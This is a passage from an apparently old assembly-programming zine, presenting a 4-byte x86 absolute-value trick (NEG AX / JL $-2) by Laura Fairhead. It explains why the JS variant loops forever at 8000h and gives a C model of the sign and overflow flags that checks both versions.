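    for (i = 0; i < 8; i++)
        out[i] = (char)((ascii >> (8 * i)) & 0xff);
}
```

With value = 0xDEADBEEF the eight bytes written are 'deadbeef'.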


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                              Absolute Value
                                                              by Laura Fairhead


The Challenge
-------------
Find the absolute value of a register in only 4 bytes.

The Solution
------------

        NEG AX
        JL SHORT $-2

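This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h:
negating 08000h gives 08000h again, so the sign flag never clears. NEG
also sets the overflow flag in that one case, and JL only branches when
the sign and overflow flags differ, so the loop is left with AX=08000h.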
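
The behaviour of both branches can be checked on paper, or with a small C
model of the flags. This is only a sketch: the function names are made up for
the example, and neg16() reproduces just the two flags that matter here (SF
and OF) for a 16-bit NEG.

```c
#include <assert.h>
#include <stdint.h>

/* One NEG AX: returns the result and reports SF and OF. */
static uint16_t neg16(uint16_t ax, int *sf, int *of)
{
    uint16_t r = (uint16_t)(0u - ax);
    *sf = (r & 0x8000u) != 0;   /* sign flag: bit 15 of the result     */
    *of = (ax == 0x8000u);      /* overflow: only 8000h has no negative */
    return r;
}

/* NEG AX / JL $-2. Returns the final AX; *negs counts the NEGs executed. */
uint16_t abs_jl(uint16_t ax, int *negs)
{
    int sf, of;
    assert(negs != 0);
    *negs = 0;
    do {
        ax = neg16(ax, &sf, &of);
        ++*negs;
    } while (sf != of);         /* JL is taken while SF differs from OF */
    return ax;
}

/* NEG AX / JS $-2. Returns 1 if the loop exits within 'limit' NEGs. */
int js_terminates(uint16_t ax, int limit)
{
    int sf, of, i;
    for (i = 0; i < limit; i++) {
        ax = neg16(ax, &sf, &of);
        if (!sf)                /* JS falls through once SF is clear */
            return 1;
    }
    return 0;
}
```

abs_jl(0x8000, &n) returns 0x8000 after a single NEG, while
js_terminates(0x8000, 1000) reports that the JS version is still looping after
1000 of them.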


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN